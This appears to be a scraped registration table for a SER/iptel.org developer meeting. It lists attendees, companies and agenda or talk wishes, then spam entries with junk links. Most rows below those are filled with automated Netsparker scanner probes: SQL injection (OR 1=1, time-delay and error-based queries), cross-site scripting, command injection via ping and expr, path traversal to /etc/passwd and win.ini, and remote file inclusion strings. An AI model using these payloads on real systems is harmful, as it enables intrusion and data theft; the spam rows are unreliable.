| First Name |
Second Name |
Company |
Agenda wishes |
Speaker proposals |
| Jiri |
Kuthan |
iptelorg |
|
|
| Nils |
Ohlmeier |
|
|
|
| thanh |
nguyen |
ipcomm |
seri, mysql |
mysql |
| Raphael |
Coeffic |
Tekelec |
paintball !!! |
|
| Jan |
Janak |
|
|
DB schema, selects, attributes, iptel.org |
| Miklos |
Tirpak |
Tekelec/iptelorg |
|
|
| Vladimir |
Marek |
|
|
|
| Alfred |
Heggestad |
Telio |
|
|
| Pavel |
Kasparek |
Iptelorg |
|
|
| Atle |
Samulsen |
Telio Telecom AS |
SERi's Future |
The power of AVP's and Selects:D |
| Martin |
Hoffmann |
Telio Telecom AS |
|
|
| Vaclav |
Kubart |
|
paintball ;-) |
|
| Bogdan |
Pintea |
iptego |
1. AVPs - next step (variables)
2. selects next step (more OO-look&feel)
3. process model - context saving/processing deferring
4. faster storing engines (building-in/interfacing)
5. core layering |
|
| Stefan |
Sayer |
iptego GmbH |
SER as SIP stck for external apps (e.g. SEMSi), and of course paintball! |
|
| Alex |
Hoffmann |
iptego GmbH |
new application interface for SER (to be introduced by Bogdan) |
|
| Matthias |
Liebig |
iptego GmbH |
|
|
| Schubert |
Christian |
iptego GmbH |
|
|
| Henry |
Sinnreich |
Adobe Systems, Inc. |
|
|
| Richard |
Shockey |
NeuStar,Inc |
pilsner vs weis beer and its relationship to P2P SIP protocols |
Why ENUM sucks.. |
| Dragos |
Vingarzan |
FOKUS |
SER 3.0 ;-) |
|
| Michael |
Haberler |
ipa |
|
|
| Andrei |
Pelinescu-Onciul |
iptelorg |
|
|
| Cristian |
Constantin |
Tekelec/iptelorg |
|
|
| Greger |
Teigre |
|
|
Status and plans on SER 2.0 documentation
Faciltate discussion on iptel.org open-source project organization |
| Monica |
Sarbu |
iptelorg |
|
|
| Tudor |
Golubenco |
iptego |
|
|
| Gergely |
Kovacs |
iptelorg |
|
|
| Massimo |
Brignoli |
MySQL AB |
MySQL Cluster |
How can MySQL Cluster support the telco market |
| Ladislav |
Andel |
vutbr |
|
|
| David |
Schwartz |
Kayote Networks |
|
|
| Alexandr |
Dubovikov |
QSC AG |
|
|
| Ondrej |
Martinek |
iptel.org |
basejumping |
ser's future; (missing) documentation |
| Libor |
Chocholaty |
Tekelec/iptel.org |
|
|
| Tomas |
Mandys |
Tekelec |
|
|
| Michal |
Matyska |
Tekelec/iptel.org |
|
|
| Andi |
Wernitz |
Intego GmbH |
|
|
| Ed |
Guy |
Truphone |
|
|
| Lakmal |
Silva |
Blekinge Institute of Technology, Sweden |
|
|
| Andreas |
Kock |
freenet Cityline GmbH |
|
|
| Andreas |
Jürgensen |
freenet Cityline GmbH |
|
|
| Olle |
Johansson |
Edvina AB |
|
|
| Jan |
Ruzicka |
CESNET |
|
|
| boqxnrant |
boqxnrant |
JNbFPMNALjwpYlPtHwT |
nqaTr4 <a href="http://biiusggafsih.com/">biiusggafsih</a>, [url=http://vvjhhkbdzsah.com/]vvjhhkbdzsah[/url], [link=http://tnfslxyvimhc.com/]tnfslxyvimhc[/link], http://cvzgtytulvfh.com/ |
nqaTr4 <a href="http://biiusggafsih.com/">biiusggafsih</a>, [url=http://vvjhhkbdzsah.com/]vvjhhkbdzsah[/url], [link=http://tnfslxyvimhc.com/]tnfslxyvimhc[/link], http://cvzgtytulvfh.com/ |
| Guadalupeun |
Guadalupeun |
google |
|
|
| Panglima |
Panglima |
zOfyvzop |
Regards for all your erfofts that you have put in this. Very interesting info. I've never known any trouble that an hour's reading didn't assuage. by Charles De Secondat. |
Regards for all your erfofts that you have put in this. Very interesting info. I've never known any trouble that an hour's reading didn't assuage. by Charles De Secondat. |
| Smith |
Smith |
3 |
%27 |
3 |
| Smith |
Smith |
3 |
-1 OR 1=1 |
3 |
| Smith |
Smith |
3 |
';WAITFOR DELAY '0:0:25'-- |
3 |
| Smith |
Smith |
3 |
-1 OR 1=1 |
3 |
| Smith |
Smith |
3 |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0033F0%29%3C%2Fscript%3E |
3 |
| Smith |
Smith |
3 |
' |
3 |
| Smith |
Smith |
3 |
1;WAITFOR DELAY '0:0:25'-- |
3 |
| Smith |
Smith |
3 |
NS1NO |
3 |
| Smith |
Smith |
3 |
' OR '1'='1 |
3 |
| Smith |
Smith |
3 |
(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) |
3 |
| Smith |
Smith |
3 |
' OR '1'='1 |
3 |
| Smith |
Smith |
3 |
WAITFOR DELAY '0:0:25'-- |
3 |
| Smith |
Smith |
-1 OR 1=1 |
3 |
3 |
| Smith |
Smith |
3 |
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAzM0YyKTwvc2NyaXB0Pg== |
3 |
| Smith |
Smith |
3 |
1);WAITFOR DELAY '0:0:25'-- |
3 |
| Smith |
Smith |
-1 OR 1=1 |
3 |
3 |
| Smith |
Smith |
3 |
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
3 |
| Smith |
Smith |
' |
3 |
3 |
| Smith |
Smith |
NS1NO |
3 |
3 |
| Smith |
Smith |
' OR '1'='1 |
3 |
3 |
| Smith |
Smith |
3 |
convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) |
3 |
| Smith |
Smith |
3 |
'" ns= netsparker(0x0033F3) |
3 |
| Smith |
Smith |
' OR '1'='1 |
3 |
3 |
| Smith |
Smith |
3 |
');WAITFOR DELAY '0:0:25'-- |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +' |
3 |
| Smith |
Smith |
3 |
1 ns=netsparker(0x0033F4) |
3 |
| Smith |
Smith |
3 |
'));WAITFOR DELAY '0:0:25'-- |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+' |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
//netsparker.com/n/n.css?0x0033F5 |
3 |
| Smith |
Smith |
3 |
1));WAITFOR DELAY '0:0:25'-- |
3 |
| -1 OR 1=1 |
Smith |
3 |
3 |
3 |
| -1 OR 1=1 |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
'><net sparker=netsparker(0x0033F6)> |
3 |
| Smith |
Smith |
3 |
-1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) |
3 |
| ' |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
3 |
| NS1NO |
Smith |
3 |
3 |
3 |
| ' OR '1'='1 |
Smith |
3 |
3 |
3 |
| ' OR '1'='1 |
Smith |
3 |
3 |
3 |
| Smith |
-1 OR 1=1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
"><net sparker=netsparker(0x0033F7)> |
3 |
| Smith |
Smith |
3 |
-1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' |
3 |
| Smith |
-1 OR 1=1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
3 |
| Smith |
' |
3 |
3 |
3 |
| Smith |
NS1NO |
3 |
3 |
3 |
| Smith |
' OR '1'='1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
javascript:netsparker(0x0033F8) |
3 |
| Smith |
Smith |
3 |
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
3 |
| Smith |
Smith |
3 |
-1" or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+" |
3 |
| Smith |
' OR '1'='1 |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
</a style=x:expre/**/ssion(netsparker(0x0033FA))> |
3 |
| Smith |
Smith |
3 |
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
3 |
| Smith |
Smith |
3 |
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 |
3 |
| Smith |
Smith |
3 |
3 |
-1 OR 1=1 |
| Smith |
Smith |
3 |
*/netsparker(0x0033FD);/* |
3 |
| Smith |
Smith |
3 |
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' |
3 |
| Smith |
Smith |
3 |
3 |
-1 OR 1=1 |
| Smith |
Smith |
3 |
(select sleep(25))a-- 1 |
3 |
| Smith |
Smith |
3 |
'+netsparker(0x0033FE)+' |
3 |
| Smith |
Smith |
3 |
3 |
' |
| Smith |
Smith |
3 |
3 |
NS1NO |
| Smith |
Smith |
3 |
3 |
' OR '1'='1 |
| Smith |
Smith |
3 |
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) |
3 |
| Smith |
Smith |
3 |
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) |
3 |
| Smith |
Smith |
3 |
3 |
' OR '1'='1 |
| Smith |
Smith |
3 |
"+netsparker(0x0033FF)+" |
3 |
| Smith |
Smith |
3 |
"& SET /A 0xFFF9999-2 & |
3 |
| Smith |
Smith |
3 |
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' |
3 |
| Smith |
Smith |
3 |
NSFTW |
3 |
| Smith |
Smith |
3 |
',netsparker(0x003400),' |
3 |
| Smith |
Smith |
3 |
'& SET /A 0xFFF9999-2 & |
3 |
| Smith |
Smith |
3 |
';SELECT pg_sleep(25)-- |
3 |
| Smith |
Smith |
3 |
'+NSFTW+' |
3 |
| Smith |
Smith |
3 |
netsparker(0x003401) |
3 |
| Smith |
Smith |
3 |
(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) |
3 |
| Smith |
Smith |
3 |
netsparker(0x003402); |
3 |
| Smith |
Smith |
3 |
& SET /A 0xFFF9999-2 & |
3 |
| Smith |
Smith |
3 |
"& ping -n 26 127.0.0.1 & |
3 |
| Smith |
Smith |
3 |
1;SELECT pg_sleep(25)-- |
3 |
| Smith |
Smith |
3 |
SET /A 0xFFF9999-2 & |
3 |
| Smith |
Smith |
3 |
-1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' |
3 |
| Smith |
Smith |
3 |
SELECT pg_sleep(25)-- |
3 |
| Smith |
Smith |
3 |
'& ping -n 26 127.0.0.1 & |
3 |
| Smith |
Smith |
3 |
"&expr 268409241 - 2 &" |
3 |
| Smith |
Smith |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%2 |
3 |
3 |
| Smith |
Smith |
3 |
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 |
3 |
| Smith |
Smith |
3 |
1);SELECT pg_sleep(25)-- |
3 |
| Smith |
Smith |
3 |
& ping -n 26 127.0.0.1 & |
3 |
| Smith |
Smith |
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAzNDA3KTwvc2NyaXB |
3 |
3 |
| Smith |
Smith |
3 |
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) |
3 |
| Smith |
Smith |
3 |
'&expr 268409241 - 2 &' |
3 |
| Smith |
Smith |
3 |
');SELECT pg_sleep(25)-- |
3 |
| Smith |
Smith |
3 |
ping -n 26 127.0.0.1 & |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../boot.ini |
3 |
| Smith |
Smith |
'" ns= netsparker(0x003409) |
3 |
3 |
| Smith |
Smith |
3 |
&expr 268409241 - 2 & |
3 |
| Smith |
Smith |
3 |
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' |
3 |
| Smith |
Smith |
3 |
"&ping -c 26 127.0.0.1 &" |
3 |
| Smith |
Smith |
3 |
'));SELECT pg_sleep(25)-- |
3 |
| Smith |
Smith |
3 |
expr 268409241 - 2 & |
3 |
| Smith |
Smith |
1 ns=netsparker(0x00340C) |
3 |
3 |
| Smith |
Smith |
3 |
hTTp://netsparker.com/n |
3 |
| Smith |
Smith |
%27 |
3 |
3 |
| Smith |
Smith |
3 |
1));SELECT pg_sleep(25)-- |
3 |
| Smith |
Smith |
3 |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
3 |
| Smith |
Smith |
3 |
'&ping -c 26 127.0.0.1 &' |
3 |
| Smith |
Smith |
3 |
http://netsparker.com/n? .php |
3 |
| Smith |
Smith |
//netsparker.com/n/n.css?0x00340D |
3 |
3 |
| Smith |
Smith |
3 |
SET /A 0xFFF9999-2 |
3 |
| Smith |
Smith |
3 |
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../boot.ini .php |
3 |
| Smith |
Smith |
(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100 |
3 |
3 |
| Smith |
Smith |
3 |
&ping -c 26 127.0.0.1 & |
3 |
| Smith |
Smith |
3 |
http://netsparker.com/n?.php |
3 |
| Smith |
Smith |
3 |
expr 268409241 - 2 |
3 |
| Smith |
Smith |
'><net sparker=netsparker(0x00340E)> |
3 |
3 |
| Smith |
Smith |
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR( |
3 |
3 |
| Smith |
Smith |
3 |
(SELECT 1 FROM (SELECT SLEEP(25))A) |
3 |
| Smith |
Smith |
3 |
/../../../../../../../../../../boot.ini |
3 |
| Smith |
Smith |
3 |
ping -c 26 127.0.0.1 & |
3 |
| Smith |
Smith |
"><net sparker=netsparker(0x00340F)> |
3 |
3 |
| Smith |
Smith |
3 |
php://filter//resource=http://netsparker.com/n? .php |
3 |
| Smith |
Smith |
"& SET /A 0xFFF9999-2 & |
3 |
3 |
| Smith |
Smith |
convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR( |
3 |
3 |
| Smith |
Smith |
3 |
file:/windows/win.ini |
3 |
| Smith |
Smith |
3 |
'+(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
3 |
| Smith |
Smith |
javascript:netsparker(0x003410) |
3 |
3 |
| Smith |
Smith |
3 |
netsparker.com/n |
3 |
| Smith |
Smith |
3 |
ping -n 26 127.0.0.1 |
3 |
| Smith |
Smith |
'& SET /A 0xFFF9999-2 & |
3 |
3 |
| Smith |
Smith |
3 |
-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+' |
3 |
| Smith |
Smith |
'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CH |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../windows/win.ini |
3 |
| Smith |
Smith |
& SET /A 0xFFF9999-2 & |
3 |
3 |
| Smith |
Smith |
hTTp://netsparker.com/n |
3 |
3 |
| Smith |
Smith |
</a style=x:expre/**/ssion(netsparker(0x003412))> |
3 |
3 |
| Smith |
Smith |
'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+ |
3 |
3 |
| Smith |
Smith |
3 |
ping -c 26 127.0.0.1 |
3 |
| Smith |
Smith |
3 |
-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A) |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../windows/win.ini .php |
3 |
| Smith |
Smith |
SET /A 0xFFF9999-2 & |
3 |
3 |
| Smith |
Smith |
"& ping -n 26 127.0.0.1 & |
3 |
3 |
| Smith |
Smith |
http://netsparker.com/n? .php |
3 |
3 |
| Smith |
Smith |
3 |
c:\windows\win.ini |
3 |
| Smith |
Smith |
-1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CON |
3 |
3 |
| Smith |
Smith |
'& ping -n 26 127.0.0.1 & |
3 |
3 |
| Smith |
Smith |
3 |
-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+" |
3 |
| Smith |
Smith |
"&expr 268409241 - 2 &" |
3 |
3 |
| Smith |
Smith |
*/netsparker(0x003415);/* |
3 |
3 |
| Smith |
Smith |
http://netsparker.com/n?.php |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../windows/iis6.log |
3 |
| Smith |
Smith |
-1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT |
3 |
3 |
| Smith |
Smith |
';WAITFOR DELAY '0:0:25'-- |
3 |
3 |
| Smith |
Smith |
'&expr 268409241 - 2 &' |
3 |
3 |
| Smith |
Smith |
'+netsparker(0x003416)+' |
3 |
3 |
| Smith |
Smith |
& ping -n 26 127.0.0.1 & |
3 |
3 |
| Smith |
Smith |
php://filter//resource=http://netsparker.com/n? .php |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../proc/self/fd/2 |
3 |
| Smith |
Smith |
3 |
response.write(268409241-22)' |
3 |
| Smith |
Smith |
-1" or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT |
3 |
3 |
| Smith |
Smith |
&expr 268409241 - 2 & |
3 |
3 |
| Smith |
Smith |
1;WAITFOR DELAY '0:0:25'-- |
3 |
3 |
| Smith |
Smith |
ping -n 26 127.0.0.1 & |
3 |
3 |
| Smith |
Smith |
netsparker.com/n |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../proc/self/fd/2 .php |
3 |
| Smith |
Smith |
"+netsparker(0x003417)+" |
3 |
3 |
| Smith |
Smith |
3 |
+response.write(268409241-22)' |
3 |
| Smith |
Smith |
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHA |
3 |
3 |
| Smith |
Smith |
expr 268409241 - 2 & |
3 |
3 |
| Smith |
Smith |
WAITFOR DELAY '0:0:25'-- |
3 |
3 |
| Smith |
Smith |
',netsparker(0x003418),' |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../etc/httpd/logs/error.log |
3 |
| Smith |
Smith |
"&ping -c 26 127.0.0.1 &" |
3 |
3 |
| Smith |
Smith |
3 |
"+response.write(268409241-22)+" |
3 |
| Smith |
Smith |
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(1 |
3 |
3 |
| Smith |
Smith |
1);WAITFOR DELAY '0:0:25'-- |
3 |
3 |
| Smith |
Smith |
netsparker(0x003419) |
3 |
3 |
| Smith |
Smith |
SET /A 0xFFF9999-2 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../etc/httpd/logs/error_log |
3 |
| Smith |
Smith |
3 |
<% response.write(268409241-22) %> |
3 |
| Smith |
Smith |
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||ch |
3 |
3 |
| Smith |
Smith |
'&ping -c 26 127.0.0.1 &' |
3 |
3 |
| Smith |
Smith |
netsparker(0x00341A); |
3 |
3 |
| Smith |
Smith |
expr 268409241 - 2 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
');WAITFOR DELAY '0:0:25'-- |
3 |
3 |
| Smith |
Smith |
3 |
print(int)0xFFF9999-22 |
3 |
| Smith |
Smith |
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)|| |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../var/log/apache2/error.log |
3 |
| Smith |
Smith |
&ping -c 26 127.0.0.1 & |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
'));WAITFOR DELAY '0:0:25'-- |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
NSFTW |
3 |
3 |
| Smith |
Smith |
3 |
+print(int)0xFFF9999-22;// |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../var/log/apache/error.log |
3 |
| Smith |
Smith |
ping -c 26 127.0.0.1 & |
3 |
3 |
| Smith |
Smith |
1));WAITFOR DELAY '0:0:25'-- |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../proc/self/version |
3 |
| Smith |
Smith |
'+NSFTW+' |
3 |
3 |
| Smith |
Smith |
ping -n 26 127.0.0.1 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| hTTp://netsparker.com/n |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48 |
3 |
3 |
| Smith |
Smith |
3 |
'+print(int)0xFFF9999-22+' |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../proc/self/version .php |
3 |
| Smith |
Smith |
(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),C |
3 |
3 |
| Smith |
Smith |
ping -c 26 127.0.0.1 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| http://netsparker.com/n? .php |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../../etc/passwd |
3 |
| Smith |
Smith |
3 |
"+print(int)0xFFF9999-22+" |
3 |
| Smith |
Smith |
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+ |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
-1'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(9 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| http://netsparker.com/n?.php |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
<? print(int)0xFFF9999-22;//?> |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../../etc/passwd |
3 |
| Smith |
Smith |
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48) |
3 |
3 |
| Smith |
Smith |
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR( |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| php://filter//resource=http://netsparker.com/n? .php |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
{php}print(int)0xFFF9999-22;{/php} |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48) |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
../../../../../../../../../../../etc/passwd .php |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64) |
3 |
3 |
| netsparker.com/n |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
'{${print(int)0xFFF9999-22}}' |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
3 |
| Smith |
Smith |
(select sleep(25))a-- 1 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
hTTp://netsparker.com/n |
3 |
3 |
3 |
| Smith |
Smith |
3 |
3 |
3 |
| Smith |
Smith |
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr |
3 |
3 |
| Smith |
Smith |
3 |
ns../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.